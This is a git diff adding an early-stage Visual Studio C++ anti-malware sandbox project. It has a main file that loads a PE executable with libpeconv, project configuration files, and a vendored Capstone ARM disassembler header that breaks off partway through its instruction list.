diff --git a/.vscode/settings.json b/.vscode/settings.json new file mode 100644 index 0000000..34c22c9 --- /dev/null +++ b/.vscode/settings.json @@ -0,0 +1,60 @@ +{ + "files.associations": { + "iostream": "cpp", + "xstring": "cpp", + "algorithm": "cpp", + "atomic": "cpp", + "bit": "cpp", + "cctype": "cpp", + "clocale": "cpp", + "cmath": "cpp", + "compare": "cpp", + "concepts": "cpp", + "cstddef": "cpp", + "cstdint": "cpp", + "cstdio": "cpp", + "cstdlib": "cpp", + "cstring": "cpp", + "ctime": "cpp", + "cwchar": "cpp", + "exception": "cpp", + "fstream": "cpp", + "initializer_list": "cpp", + "iomanip": "cpp", + "ios": "cpp", + "iosfwd": "cpp", + "istream": "cpp", + "iterator": "cpp", + "limits": "cpp", + "list": "cpp", + "map": "cpp", + "memory": "cpp", + "new": "cpp", + "ostream": "cpp", + "set": "cpp", + "sstream": "cpp", + "stdexcept": "cpp", + "streambuf": "cpp", + "string": "cpp", + "system_error": "cpp", + "tuple": "cpp", + "type_traits": "cpp", + "typeinfo": "cpp", + "unordered_map": "cpp", + "utility": "cpp", + "vector": "cpp", + "xfacet": "cpp", + "xhash": "cpp", + "xiosbase": "cpp", + "xlocale": "cpp", + "xlocinfo": "cpp", + "xlocmon": "cpp", + "xlocnum": "cpp", + "xloctime": "cpp", + "xmemory": "cpp", + "xstddef": "cpp", + "xtr1common": "cpp", + "xtree": "cpp", + "xutility": "cpp" + } +} \ No newline at end of file diff --git a/ai_anti_malware.sln b/ai_anti_malware.sln new file mode 100644 index 0000000..4e9a213 --- /dev/null +++ b/ai_anti_malware.sln @@ -0,0 +1,31 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 16 +VisualStudioVersion = 16.0.35731.53 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ai_anti_malware", "ai_anti_malware\ai_anti_malware.vcxproj", "{E12C93D6-6150-484D-85E1-7A644E393D5A}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {E12C93D6-6150-484D-85E1-7A644E393D5A}.Debug|x64.ActiveCfg = Debug|x64 + {E12C93D6-6150-484D-85E1-7A644E393D5A}.Debug|x64.Build.0 = Debug|x64 + {E12C93D6-6150-484D-85E1-7A644E393D5A}.Debug|x86.ActiveCfg = Debug|Win32 + {E12C93D6-6150-484D-85E1-7A644E393D5A}.Debug|x86.Build.0 = Debug|Win32 + {E12C93D6-6150-484D-85E1-7A644E393D5A}.Release|x64.ActiveCfg = Release|x64 + {E12C93D6-6150-484D-85E1-7A644E393D5A}.Release|x64.Build.0 = Release|x64 + {E12C93D6-6150-484D-85E1-7A644E393D5A}.Release|x86.ActiveCfg = Release|Win32 + {E12C93D6-6150-484D-85E1-7A644E393D5A}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {4B304E25-0491-4346-8FCB-7E30DDEB2E43} + EndGlobalSection +EndGlobal diff --git a/ai_anti_malware/ai_anti_malware.cpp b/ai_anti_malware/ai_anti_malware.cpp new file mode 100644 index 0000000..4744838 --- /dev/null +++ b/ai_anti_malware/ai_anti_malware.cpp @@ -0,0 +1,48 @@ +// ai_anti_malware.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。 +// + +#include "head.h" + +auto getPeInfo(std::string inputFilePath) -> std::shared_ptr { + auto sampleInfo = std::make_shared(); + sampleInfo->inputFilePath = + "E:\\对战平台\\CrowAntiCheat\\CrowAntiCheat\\client\\Console_" + "Test\\Release\\Console_Test.exe"; + + sampleInfo->peBuffer = + peconv::load_pe_module((const char*)sampleInfo->inputFilePath.c_str(), + sampleInfo->peSize, false, false); + sampleInfo->ntHead64 = peconv::get_nt_hdrs64((BYTE*)sampleInfo->peBuffer); + sampleInfo->ntHead32 = peconv::get_nt_hdrs32((BYTE*)sampleInfo->peBuffer); + sampleInfo->isX64 = peconv::is64bit((BYTE*)sampleInfo->peBuffer); + sampleInfo->RecImageBase = + sampleInfo->isX64 + ? (DWORD64)sampleInfo->ntHead64->OptionalHeader.ImageBase + : (DWORD)sampleInfo->ntHead32->OptionalHeader.ImageBase; + sampleInfo->isRelocated = peconv::relocate_module( + (BYTE*)sampleInfo->peBuffer, sampleInfo->peSize, sampleInfo->RecImageBase); + + sampleInfo->entryPoint = + sampleInfo->isX64 + ? sampleInfo->ntHead64->OptionalHeader.AddressOfEntryPoint + : sampleInfo->ntHead32->OptionalHeader.AddressOfEntryPoint; + sampleInfo->imageEnd = + sampleInfo->RecImageBase + + (sampleInfo->isX64 ? sampleInfo->ntHead64->OptionalHeader.SizeOfImage + : sampleInfo->ntHead32->OptionalHeader.SizeOfImage); + return sampleInfo; +} +int main() { + auto sampleInfo = getPeInfo( + "E:\\对战平台\\CrowAntiCheat\\CrowAntiCheat\\client\\Console_" + "Test\\Release\\Console_Test.exe"); + printf("input new file %s \n", sampleInfo->inputFilePath); + printf("is x64: %d\n", sampleInfo->isX64); + printf("is relocated: %d\n", sampleInfo->isRelocated); + printf("RecImageBase: %llx\n", sampleInfo->RecImageBase); + auto sandbox = std::make_shared(); + sandbox->InitEnv(sampleInfo); + sandbox->Run(); + system("pause"); + return 0; +} diff --git a/ai_anti_malware/ai_anti_malware.vcxproj b/ai_anti_malware/ai_anti_malware.vcxproj new file mode 100644 index 0000000..d59176d --- /dev/null +++ b/ai_anti_malware/ai_anti_malware.vcxproj @@ -0,0 +1,187 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {e12c93d6-6150-484d-85e1-7a644e393d5a} + aiantimalware + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + $(SolutionDir)ai_anti_malware\libpeconv\libpeconv\;$(SolutionDir)ai_anti_malware\libpeconv\libpeconv\include;$(SolutionDir)ai_anti_malware\libpeconv\;$(IncludePath) + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + false + stdcpplatest + false + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/ai_anti_malware/ai_anti_malware.vcxproj.filters b/ai_anti_malware/ai_anti_malware.vcxproj.filters new file mode 100644 index 0000000..fe53946 --- /dev/null +++ b/ai_anti_malware/ai_anti_malware.vcxproj.filters @@ -0,0 +1,138 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + {9204f3c4-f3df-47b3-9cfc-42fcc5dd6ca9} + + + {41d9dd76-a1a6-4627-b982-cbdb41cf0f7b} + + + {38ea362d-55dc-410e-92f1-3a44ced4dc2d} + + + + + 源文件 + + + 源文件\sandbox + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 源文件\sandbox + + + + + 头文件 + + + 头文件\sandbox + + + 头文件\libpe + + + 头文件\libpe + + + 头文件 + + + 头文件\sandbox + + + \ No newline at end of file diff --git a/ai_anti_malware/capstone/capstone.lib b/ai_anti_malware/capstone/capstone.lib new file mode 100644 index 0000000..01bfdde Binary files /dev/null and b/ai_anti_malware/capstone/capstone.lib differ diff --git a/ai_anti_malware/capstone/include/capstone/arm.h b/ai_anti_malware/capstone/include/capstone/arm.h new file mode 100644 index 0000000..21ba5be --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/arm.h @@ -0,0 +1,937 @@ +#ifndef CAPSTONE_ARM_H +#define CAPSTONE_ARM_H + +/* Capstone Disassembly Engine */ +/* By Nguyen Anh Quynh , 2013-2015 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +/// ARM shift type +typedef enum arm_shifter { + ARM_SFT_INVALID = 0, + ARM_SFT_ASR, ///< shift with immediate const + ARM_SFT_LSL, ///< shift with immediate const + ARM_SFT_LSR, ///< shift with immediate const + ARM_SFT_ROR, ///< shift with immediate const + ARM_SFT_RRX, ///< shift with immediate const + ARM_SFT_ASR_REG, ///< shift with register + ARM_SFT_LSL_REG, ///< shift with register + ARM_SFT_LSR_REG, ///< shift with register + ARM_SFT_ROR_REG, ///< shift with register + ARM_SFT_RRX_REG, ///< shift with register +} arm_shifter; + +/// ARM condition code +typedef enum arm_cc { + ARM_CC_INVALID = 0, + ARM_CC_EQ, ///< Equal Equal + ARM_CC_NE, ///< Not equal Not equal, or unordered + ARM_CC_HS, ///< Carry set >, ==, or unordered + ARM_CC_LO, ///< Carry clear Less than + ARM_CC_MI, ///< Minus, negative Less than + ARM_CC_PL, ///< Plus, positive or zero >, ==, or unordered + ARM_CC_VS, ///< Overflow Unordered + ARM_CC_VC, ///< No overflow Not unordered + ARM_CC_HI, ///< Unsigned higher Greater than, or unordered + ARM_CC_LS, ///< Unsigned lower or same Less than or equal + ARM_CC_GE, ///< Greater than or equal Greater than or equal + ARM_CC_LT, ///< Less than Less than, or unordered + ARM_CC_GT, ///< Greater than Greater than + ARM_CC_LE, ///< Less than or equal <, ==, or unordered + ARM_CC_AL ///< Always (unconditional) Always (unconditional) +} arm_cc; + +typedef enum arm_sysreg { + /// Special registers for MSR + ARM_SYSREG_INVALID = 0, + + // SPSR* registers can be OR combined + ARM_SYSREG_SPSR_C = 1, + ARM_SYSREG_SPSR_X = 2, + ARM_SYSREG_SPSR_S = 4, + ARM_SYSREG_SPSR_F = 8, + + // CPSR* registers can be OR combined + ARM_SYSREG_CPSR_C = 16, + ARM_SYSREG_CPSR_X = 32, + ARM_SYSREG_CPSR_S = 64, + ARM_SYSREG_CPSR_F = 128, + + // independent registers + ARM_SYSREG_APSR = 256, + ARM_SYSREG_APSR_G, + ARM_SYSREG_APSR_NZCVQ, + ARM_SYSREG_APSR_NZCVQG, + + ARM_SYSREG_IAPSR, + ARM_SYSREG_IAPSR_G, + ARM_SYSREG_IAPSR_NZCVQG, + ARM_SYSREG_IAPSR_NZCVQ, + + ARM_SYSREG_EAPSR, + ARM_SYSREG_EAPSR_G, + ARM_SYSREG_EAPSR_NZCVQG, + ARM_SYSREG_EAPSR_NZCVQ, + + ARM_SYSREG_XPSR, + ARM_SYSREG_XPSR_G, + ARM_SYSREG_XPSR_NZCVQG, + ARM_SYSREG_XPSR_NZCVQ, + + ARM_SYSREG_IPSR, + ARM_SYSREG_EPSR, + ARM_SYSREG_IEPSR, + + ARM_SYSREG_MSP, + ARM_SYSREG_PSP, + ARM_SYSREG_PRIMASK, + ARM_SYSREG_BASEPRI, + ARM_SYSREG_BASEPRI_MAX, + ARM_SYSREG_FAULTMASK, + ARM_SYSREG_CONTROL, + + // Banked Registers + ARM_SYSREG_R8_USR, + ARM_SYSREG_R9_USR, + ARM_SYSREG_R10_USR, + ARM_SYSREG_R11_USR, + ARM_SYSREG_R12_USR, + ARM_SYSREG_SP_USR, + ARM_SYSREG_LR_USR, + ARM_SYSREG_R8_FIQ, + ARM_SYSREG_R9_FIQ, + ARM_SYSREG_R10_FIQ, + ARM_SYSREG_R11_FIQ, + ARM_SYSREG_R12_FIQ, + ARM_SYSREG_SP_FIQ, + ARM_SYSREG_LR_FIQ, + ARM_SYSREG_LR_IRQ, + ARM_SYSREG_SP_IRQ, + ARM_SYSREG_LR_SVC, + ARM_SYSREG_SP_SVC, + ARM_SYSREG_LR_ABT, + ARM_SYSREG_SP_ABT, + ARM_SYSREG_LR_UND, + ARM_SYSREG_SP_UND, + ARM_SYSREG_LR_MON, + ARM_SYSREG_SP_MON, + ARM_SYSREG_ELR_HYP, + ARM_SYSREG_SP_HYP, + + ARM_SYSREG_SPSR_FIQ, + ARM_SYSREG_SPSR_IRQ, + ARM_SYSREG_SPSR_SVC, + ARM_SYSREG_SPSR_ABT, + ARM_SYSREG_SPSR_UND, + ARM_SYSREG_SPSR_MON, + ARM_SYSREG_SPSR_HYP, +} arm_sysreg; + +/// The memory barrier constants map directly to the 4-bit encoding of +/// the option field for Memory Barrier operations. +typedef enum arm_mem_barrier { + ARM_MB_INVALID = 0, + ARM_MB_RESERVED_0, + ARM_MB_OSHLD, + ARM_MB_OSHST, + ARM_MB_OSH, + ARM_MB_RESERVED_4, + ARM_MB_NSHLD, + ARM_MB_NSHST, + ARM_MB_NSH, + ARM_MB_RESERVED_8, + ARM_MB_ISHLD, + ARM_MB_ISHST, + ARM_MB_ISH, + ARM_MB_RESERVED_12, + ARM_MB_LD, + ARM_MB_ST, + ARM_MB_SY, +} arm_mem_barrier; + +/// Operand type for instruction's operands +typedef enum arm_op_type { + ARM_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + ARM_OP_REG, ///< = CS_OP_REG (Register operand). + ARM_OP_IMM, ///< = CS_OP_IMM (Immediate operand). + ARM_OP_MEM, ///< = CS_OP_MEM (Memory operand). + ARM_OP_FP, ///< = CS_OP_FP (Floating-Point operand). + ARM_OP_CIMM = 64, ///< C-Immediate (coprocessor registers) + ARM_OP_PIMM, ///< P-Immediate (coprocessor registers) + ARM_OP_SETEND, ///< operand for SETEND instruction + ARM_OP_SYSREG, ///< MSR/MRS special register operand +} arm_op_type; + +/// Operand type for SETEND instruction +typedef enum arm_setend_type { + ARM_SETEND_INVALID = 0, ///< Uninitialized. + ARM_SETEND_BE, ///< BE operand. + ARM_SETEND_LE, ///< LE operand +} arm_setend_type; + +typedef enum arm_cpsmode_type { + ARM_CPSMODE_INVALID = 0, + ARM_CPSMODE_IE = 2, + ARM_CPSMODE_ID = 3 +} arm_cpsmode_type; + +/// Operand type for SETEND instruction +typedef enum arm_cpsflag_type { + ARM_CPSFLAG_INVALID = 0, + ARM_CPSFLAG_F = 1, + ARM_CPSFLAG_I = 2, + ARM_CPSFLAG_A = 4, + ARM_CPSFLAG_NONE = 16, ///< no flag +} arm_cpsflag_type; + +/// Data type for elements of vector instructions. +typedef enum arm_vectordata_type { + ARM_VECTORDATA_INVALID = 0, + + // Integer type + ARM_VECTORDATA_I8, + ARM_VECTORDATA_I16, + ARM_VECTORDATA_I32, + ARM_VECTORDATA_I64, + + // Signed integer type + ARM_VECTORDATA_S8, + ARM_VECTORDATA_S16, + ARM_VECTORDATA_S32, + ARM_VECTORDATA_S64, + + // Unsigned integer type + ARM_VECTORDATA_U8, + ARM_VECTORDATA_U16, + ARM_VECTORDATA_U32, + ARM_VECTORDATA_U64, + + // Data type for VMUL/VMULL + ARM_VECTORDATA_P8, + + // Floating type + ARM_VECTORDATA_F32, + ARM_VECTORDATA_F64, + + // Convert float <-> float + ARM_VECTORDATA_F16F64, // f16.f64 + ARM_VECTORDATA_F64F16, // f64.f16 + ARM_VECTORDATA_F32F16, // f32.f16 + ARM_VECTORDATA_F16F32, // f32.f16 + ARM_VECTORDATA_F64F32, // f64.f32 + ARM_VECTORDATA_F32F64, // f32.f64 + + // Convert integer <-> float + ARM_VECTORDATA_S32F32, // s32.f32 + ARM_VECTORDATA_U32F32, // u32.f32 + ARM_VECTORDATA_F32S32, // f32.s32 + ARM_VECTORDATA_F32U32, // f32.u32 + ARM_VECTORDATA_F64S16, // f64.s16 + ARM_VECTORDATA_F32S16, // f32.s16 + ARM_VECTORDATA_F64S32, // f64.s32 + ARM_VECTORDATA_S16F64, // s16.f64 + ARM_VECTORDATA_S16F32, // s16.f64 + ARM_VECTORDATA_S32F64, // s32.f64 + ARM_VECTORDATA_U16F64, // u16.f64 + ARM_VECTORDATA_U16F32, // u16.f32 + ARM_VECTORDATA_U32F64, // u32.f64 + ARM_VECTORDATA_F64U16, // f64.u16 + ARM_VECTORDATA_F32U16, // f32.u16 + ARM_VECTORDATA_F64U32, // f64.u32 +} arm_vectordata_type; + +/// ARM registers +typedef enum arm_reg { + ARM_REG_INVALID = 0, + ARM_REG_APSR, + ARM_REG_APSR_NZCV, + ARM_REG_CPSR, + ARM_REG_FPEXC, + ARM_REG_FPINST, + ARM_REG_FPSCR, + ARM_REG_FPSCR_NZCV, + ARM_REG_FPSID, + ARM_REG_ITSTATE, + ARM_REG_LR, + ARM_REG_PC, + ARM_REG_SP, + ARM_REG_SPSR, + ARM_REG_D0, + ARM_REG_D1, + ARM_REG_D2, + ARM_REG_D3, + ARM_REG_D4, + ARM_REG_D5, + ARM_REG_D6, + ARM_REG_D7, + ARM_REG_D8, + ARM_REG_D9, + ARM_REG_D10, + ARM_REG_D11, + ARM_REG_D12, + ARM_REG_D13, + ARM_REG_D14, + ARM_REG_D15, + ARM_REG_D16, + ARM_REG_D17, + ARM_REG_D18, + ARM_REG_D19, + ARM_REG_D20, + ARM_REG_D21, + ARM_REG_D22, + ARM_REG_D23, + ARM_REG_D24, + ARM_REG_D25, + ARM_REG_D26, + ARM_REG_D27, + ARM_REG_D28, + ARM_REG_D29, + ARM_REG_D30, + ARM_REG_D31, + ARM_REG_FPINST2, + ARM_REG_MVFR0, + ARM_REG_MVFR1, + ARM_REG_MVFR2, + ARM_REG_Q0, + ARM_REG_Q1, + ARM_REG_Q2, + ARM_REG_Q3, + ARM_REG_Q4, + ARM_REG_Q5, + ARM_REG_Q6, + ARM_REG_Q7, + ARM_REG_Q8, + ARM_REG_Q9, + ARM_REG_Q10, + ARM_REG_Q11, + ARM_REG_Q12, + ARM_REG_Q13, + ARM_REG_Q14, + ARM_REG_Q15, + ARM_REG_R0, + ARM_REG_R1, + ARM_REG_R2, + ARM_REG_R3, + ARM_REG_R4, + ARM_REG_R5, + ARM_REG_R6, + ARM_REG_R7, + ARM_REG_R8, + ARM_REG_R9, + ARM_REG_R10, + ARM_REG_R11, + ARM_REG_R12, + ARM_REG_S0, + ARM_REG_S1, + ARM_REG_S2, + ARM_REG_S3, + ARM_REG_S4, + ARM_REG_S5, + ARM_REG_S6, + ARM_REG_S7, + ARM_REG_S8, + ARM_REG_S9, + ARM_REG_S10, + ARM_REG_S11, + ARM_REG_S12, + ARM_REG_S13, + ARM_REG_S14, + ARM_REG_S15, + ARM_REG_S16, + ARM_REG_S17, + ARM_REG_S18, + ARM_REG_S19, + ARM_REG_S20, + ARM_REG_S21, + ARM_REG_S22, + ARM_REG_S23, + ARM_REG_S24, + ARM_REG_S25, + ARM_REG_S26, + ARM_REG_S27, + ARM_REG_S28, + ARM_REG_S29, + ARM_REG_S30, + ARM_REG_S31, + + ARM_REG_ENDING, // <-- mark the end of the list or registers + + // alias registers + ARM_REG_R13 = ARM_REG_SP, + ARM_REG_R14 = ARM_REG_LR, + ARM_REG_R15 = ARM_REG_PC, + + ARM_REG_SB = ARM_REG_R9, + ARM_REG_SL = ARM_REG_R10, + ARM_REG_FP = ARM_REG_R11, + ARM_REG_IP = ARM_REG_R12, +} arm_reg; + +/// Instruction's operand referring to memory +/// This is associated with ARM_OP_MEM operand type above +typedef struct arm_op_mem { + arm_reg base; ///< base register + arm_reg index; ///< index register + int scale; ///< scale for index register (can be 1, or -1) + int disp; ///< displacement/offset value + /// left-shift on index register, or 0 if irrelevant + /// NOTE: this value can also be fetched via operand.shift.value + int lshift; +} arm_op_mem; + +/// Instruction operand +typedef struct cs_arm_op { + int vector_index; ///< Vector Index for some vector operands (or -1 if irrelevant) + + struct { + arm_shifter type; + unsigned int value; + } shift; + + arm_op_type type; ///< operand type + + union { + int reg; ///< register value for REG/SYSREG operand + int32_t imm; ///< immediate value for C-IMM, P-IMM or IMM operand + double fp; ///< floating point value for FP operand + arm_op_mem mem; ///< base/index/scale/disp value for MEM operand + arm_setend_type setend; ///< SETEND instruction's operand type + }; + + /// in some instructions, an operand can be subtracted or added to + /// the base register, + /// if TRUE, this operand is subtracted. otherwise, it is added. + bool subtracted; + + /// How is this operand accessed? (READ, WRITE or READ|WRITE) + /// This field is combined of cs_ac_type. + /// NOTE: this field is irrelevant if engine is compiled in DIET mode. + uint8_t access; + + /// Neon lane index for NEON instructions (or -1 if irrelevant) + int8_t neon_lane; +} cs_arm_op; + +/// Instruction structure +typedef struct cs_arm { + bool usermode; ///< User-mode registers to be loaded (for LDM/STM instructions) + int vector_size; ///< Scalar size for vector instructions + arm_vectordata_type vector_data; ///< Data type for elements of vector instructions + arm_cpsmode_type cps_mode; ///< CPS mode for CPS instruction + arm_cpsflag_type cps_flag; ///< CPS mode for CPS instruction + arm_cc cc; ///< conditional code for this insn + bool update_flags; ///< does this insn update flags? + bool writeback; ///< does this insn write-back? + arm_mem_barrier mem_barrier; ///< Option for some memory barrier instructions + + /// Number of operands of this instruction, + /// or 0 when instruction has no operand. + uint8_t op_count; + + cs_arm_op operands[36]; ///< operands for this instruction. +} cs_arm; + +/// ARM instruction +typedef enum arm_insn { + ARM_INS_INVALID = 0, + + ARM_INS_ADC, + ARM_INS_ADD, + ARM_INS_ADR, + ARM_INS_AESD, + ARM_INS_AESE, + ARM_INS_AESIMC, + ARM_INS_AESMC, + ARM_INS_AND, + ARM_INS_BFC, + ARM_INS_BFI, + ARM_INS_BIC, + ARM_INS_BKPT, + ARM_INS_BL, + ARM_INS_BLX, + ARM_INS_BX, + ARM_INS_BXJ, + ARM_INS_B, + ARM_INS_CDP, + ARM_INS_CDP2, + ARM_INS_CLREX, + ARM_INS_CLZ, + ARM_INS_CMN, + ARM_INS_CMP, + ARM_INS_CPS, + ARM_INS_CRC32B, + ARM_INS_CRC32CB, + ARM_INS_CRC32CH, + ARM_INS_CRC32CW, + ARM_INS_CRC32H, + ARM_INS_CRC32W, + ARM_INS_DBG, + ARM_INS_DMB, + ARM_INS_DSB, + ARM_INS_EOR, + ARM_INS_ERET, + ARM_INS_VMOV, + ARM_INS_FLDMDBX, + ARM_INS_FLDMIAX, + ARM_INS_VMRS, + ARM_INS_FSTMDBX, + ARM_INS_FSTMIAX, + ARM_INS_HINT, + ARM_INS_HLT, + ARM_INS_HVC, + ARM_INS_ISB, + ARM_INS_LDA, + ARM_INS_LDAB, + ARM_INS_LDAEX, + ARM_INS_LDAEXB, + ARM_INS_LDAEXD, + ARM_INS_LDAEXH, + ARM_INS_LDAH, + ARM_INS_LDC2L, + ARM_INS_LDC2, + ARM_INS_LDCL, + ARM_INS_LDC, + ARM_INS_LDMDA, + ARM_INS_LDMDB, + ARM_INS_LDM, + ARM_INS_LDMIB, + ARM_INS_LDRBT, + ARM_INS_LDRB, + ARM_INS_LDRD, + ARM_INS_LDREX, + ARM_INS_LDREXB, + ARM_INS_LDREXD, + ARM_INS_LDREXH, + ARM_INS_LDRH, + ARM_INS_LDRHT, + ARM_INS_LDRSB, + ARM_INS_LDRSBT, + ARM_INS_LDRSH, + ARM_INS_LDRSHT, + ARM_INS_LDRT, + ARM_INS_LDR, + ARM_INS_MCR, + ARM_INS_MCR2, + ARM_INS_MCRR, + ARM_INS_MCRR2, + ARM_INS_MLA, + ARM_INS_MLS, + ARM_INS_MOV, + ARM_INS_MOVT, + ARM_INS_MOVW, + ARM_INS_MRC, + ARM_INS_MRC2, + ARM_INS_MRRC, + ARM_INS_MRRC2, + ARM_INS_MRS, + ARM_INS_MSR, + ARM_INS_MUL, + ARM_INS_MVN, + ARM_INS_ORR, + ARM_INS_PKHBT, + ARM_INS_PKHTB, + ARM_INS_PLDW, + ARM_INS_PLD, + ARM_INS_PLI, + ARM_INS_QADD, + ARM_INS_QADD16, + ARM_INS_QADD8, + ARM_INS_QASX, + ARM_INS_QDADD, + ARM_INS_QDSUB, + ARM_INS_QSAX, + ARM_INS_QSUB, + ARM_INS_QSUB16, + ARM_INS_QSUB8, + ARM_INS_RBIT, + ARM_INS_REV, + ARM_INS_REV16, + ARM_INS_REVSH, + ARM_INS_RFEDA, + ARM_INS_RFEDB, + ARM_INS_RFEIA, + ARM_INS_RFEIB, + ARM_INS_RSB, + ARM_INS_RSC, + ARM_INS_SADD16, + ARM_INS_SADD8, + ARM_INS_SASX, + ARM_INS_SBC, + ARM_INS_SBFX, + ARM_INS_SDIV, + ARM_INS_SEL, + ARM_INS_SETEND, + ARM_INS_SHA1C, + ARM_INS_SHA1H, + ARM_INS_SHA1M, + ARM_INS_SHA1P, + ARM_INS_SHA1SU0, + ARM_INS_SHA1SU1, + ARM_INS_SHA256H, + ARM_INS_SHA256H2, + ARM_INS_SHA256SU0, + ARM_INS_SHA256SU1, + ARM_INS_SHADD16, + ARM_INS_SHADD8, + ARM_INS_SHASX, + ARM_INS_SHSAX, + ARM_INS_SHSUB16, + ARM_INS_SHSUB8, + ARM_INS_SMC, + ARM_INS_SMLABB, + ARM_INS_SMLABT, + ARM_INS_SMLAD, + ARM_INS_SMLADX, + ARM_INS_SMLAL, + ARM_INS_SMLALBB, + ARM_INS_SMLALBT, + ARM_INS_SMLALD, + ARM_INS_SMLALDX, + ARM_INS_SMLALTB, + ARM_INS_SMLALTT, + ARM_INS_SMLATB, + ARM_INS_SMLATT, + ARM_INS_SMLAWB, + ARM_INS_SMLAWT, + ARM_INS_SMLSD, + ARM_INS_SMLSDX, + ARM_INS_SMLSLD, + ARM_INS_SMLSLDX, + ARM_INS_SMMLA, + ARM_INS_SMMLAR, + ARM_INS_SMMLS, + ARM_INS_SMMLSR, + ARM_INS_SMMUL, + ARM_INS_SMMULR, + ARM_INS_SMUAD, + ARM_INS_SMUADX, + ARM_INS_SMULBB, + ARM_INS_SMULBT, + ARM_INS_SMULL, + ARM_INS_SMULTB, + ARM_INS_SMULTT, + ARM_INS_SMULWB, + ARM_INS_SMULWT, + ARM_INS_SMUSD, + ARM_INS_SMUSDX, + ARM_INS_SRSDA, + ARM_INS_SRSDB, + ARM_INS_SRSIA, + ARM_INS_SRSIB, + ARM_INS_SSAT, + ARM_INS_SSAT16, + ARM_INS_SSAX, + ARM_INS_SSUB16, + ARM_INS_SSUB8, + ARM_INS_STC2L, + ARM_INS_STC2, + ARM_INS_STCL, + ARM_INS_STC, + ARM_INS_STL, + ARM_INS_STLB, + ARM_INS_STLEX, + ARM_INS_STLEXB, + ARM_INS_STLEXD, + ARM_INS_STLEXH, + ARM_INS_STLH, + ARM_INS_STMDA, + ARM_INS_STMDB, + ARM_INS_STM, + ARM_INS_STMIB, + ARM_INS_STRBT, + ARM_INS_STRB, + ARM_INS_STRD, + ARM_INS_STREX, + ARM_INS_STREXB, + ARM_INS_STREXD, + ARM_INS_STREXH, + ARM_INS_STRH, + ARM_INS_STRHT, + ARM_INS_STRT, + ARM_INS_STR, + ARM_INS_SUB, + ARM_INS_SVC, + ARM_INS_SWP, + ARM_INS_SWPB, + ARM_INS_SXTAB, + ARM_INS_SXTAB16, + ARM_INS_SXTAH, + ARM_INS_SXTB, + ARM_INS_SXTB16, + ARM_INS_SXTH, + ARM_INS_TEQ, + ARM_INS_TRAP, + ARM_INS_TST, + ARM_INS_UADD16, + ARM_INS_UADD8, + ARM_INS_UASX, + ARM_INS_UBFX, + ARM_INS_UDF, + ARM_INS_UDIV, + ARM_INS_UHADD16, + ARM_INS_UHADD8, + ARM_INS_UHASX, + ARM_INS_UHSAX, + ARM_INS_UHSUB16, + ARM_INS_UHSUB8, + ARM_INS_UMAAL, + ARM_INS_UMLAL, + ARM_INS_UMULL, + ARM_INS_UQADD16, + ARM_INS_UQADD8, + ARM_INS_UQASX, + ARM_INS_UQSAX, + ARM_INS_UQSUB16, + ARM_INS_UQSUB8, + ARM_INS_USAD8, + ARM_INS_USADA8, + ARM_INS_USAT, + ARM_INS_USAT16, + ARM_INS_USAX, + ARM_INS_USUB16, + ARM_INS_USUB8, + ARM_INS_UXTAB, + ARM_INS_UXTAB16, + ARM_INS_UXTAH, + ARM_INS_UXTB, + ARM_INS_UXTB16, + ARM_INS_UXTH, + ARM_INS_VABAL, + ARM_INS_VABA, + ARM_INS_VABDL, + ARM_INS_VABD, + ARM_INS_VABS, + ARM_INS_VACGE, + ARM_INS_VACGT, + ARM_INS_VADD, + ARM_INS_VADDHN, + ARM_INS_VADDL, + ARM_INS_VADDW, + ARM_INS_VAND, + ARM_INS_VBIC, + ARM_INS_VBIF, + ARM_INS_VBIT, + ARM_INS_VBSL, + ARM_INS_VCEQ, + ARM_INS_VCGE, + ARM_INS_VCGT, + ARM_INS_VCLE, + 